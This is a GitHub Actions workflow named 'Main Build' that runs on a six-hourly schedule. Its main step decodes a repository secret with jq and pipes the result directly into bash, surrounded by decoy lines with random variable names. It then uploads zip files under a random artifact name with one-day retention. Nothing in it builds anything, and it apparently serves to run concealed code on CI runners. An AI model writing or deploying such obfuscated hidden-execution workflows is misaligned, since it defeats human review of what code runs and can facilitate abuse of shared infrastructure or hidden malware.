name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '35 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  scheduler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Invoke
        env:
          javvn184: ${{ secrets.javvn184 }}
        run: |
          printf '%s' "$javvn184" | jq -r .jlrg663 | /bin/bash
          echo $jjxj708 | jq -r .ewvn49458 | /bin/bash
          echo $fis8283 | jq -r .geosb45913 | /bin/bash
          echo $n288 | jq -r .yuv94 | /bin/bash
          echo $kqzf76 | jq -r .x63 | /bin/bash
          printf '%s' "$wzzh4" | jq -r .qtjo077 | /bin/bash
          printf '%s' "$rye656" | jq -r .plom0229 | /bin/bash
          echo $v4 | jq -r .gdwt54430 | /bin/bash

      - name: Store artifact
        uses: actions/upload-artifact@v4
        with:
          name: M67PUxcN
          path: "*.zip"
          retention-days: 1
